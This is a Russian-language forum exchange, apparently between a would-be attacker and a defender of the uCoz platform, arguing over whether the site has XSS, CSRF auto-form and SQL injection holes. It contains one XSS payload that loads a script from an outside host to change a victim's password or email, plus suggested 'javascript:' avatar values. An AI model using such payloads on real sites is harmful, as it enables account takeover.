А я заранее уверен, что он дырявый и ещё какой...докажи мне что он защищённый и докажу что он дырявый=)
факт не нужно доказывать, если взломаешь, то факты будут у тебя, а пока система не взломана, то фактами располагаю я.
в профайле в поле ссылки на аватуру.
Можно выполнить експлутировать скрипт
javascript: анти-киддис-бгг
vbscript: анти-киддис-бгг
дай ка ссылку где ты в аватару на юкозе смог XSS засунуть. а то говорить ты горазд, это очень заментно.
по поводу пассивных их там оч. много.
очень много от тебя никто не просит, покажи ОДНУ.
По поводу создания автоформ для смены пароля или е-майла, проанализировав ситуацию, что вся защита от автоформ строить в проверке реферера.
ты даже не знаешь что пароль и мыло меняются при редактировании профиля.... если бы знал то так бы и сказал, а не разделял эти два понятия. Так вот, мало того что там реферер проверяется, там еще и айди сессии проверяется, а это значит что твоя автоформа не сработает....
Понял, что можно експлуатировать наиболее удачную пассивную XSS
и составить запрос типа "><script src=http://mirinet.narod.ru/qwe.js></script>
где в qwe.js будет закодированная автоформа так мы обойдём единственную защиту проверку реферера.
т.к. запрос будет от юкоза=)
ты вообще разбираешься в веб=технологиях или пишешь то что сам можешь придумать? подменить реферер можно только сервер сайд скриптом, которым весь запрос формируешь.... а если подключать яваскрипт или что угодно еще, реферер браузер сам формирует, и значит подделать его не выйдет.
По поводу уязвимостей более серьёзных:
было пару подозрений на sql-inj.
чудо, ты хоть понимаешь что, для того чтобы делать SQL инъекции нужно знать структуру базы, название полей и т.д., а для этого нужно исходники изучать....
Твой каждый пост только показывает всю твою малограмотность в веб-технологиях.
Пока ты не продемонстрируешь хоть 1 рабочую дыру на юкозе, будь то XSS через png или аватар или BBкод или что-то еще, или сможешь соорудить рабочую автоформу ты будешь оставаться просто лаптем, который ничего кроме как ляпать не умеет....
Пойми, за нашим разговором следят и другие люди, и они прекрасно видят кто есть кто... так что можешь писать что тебе смешно читать мои сообщения, другие то смеются над тобой...... столько слов про уязвимости юкоза и нулевой результат.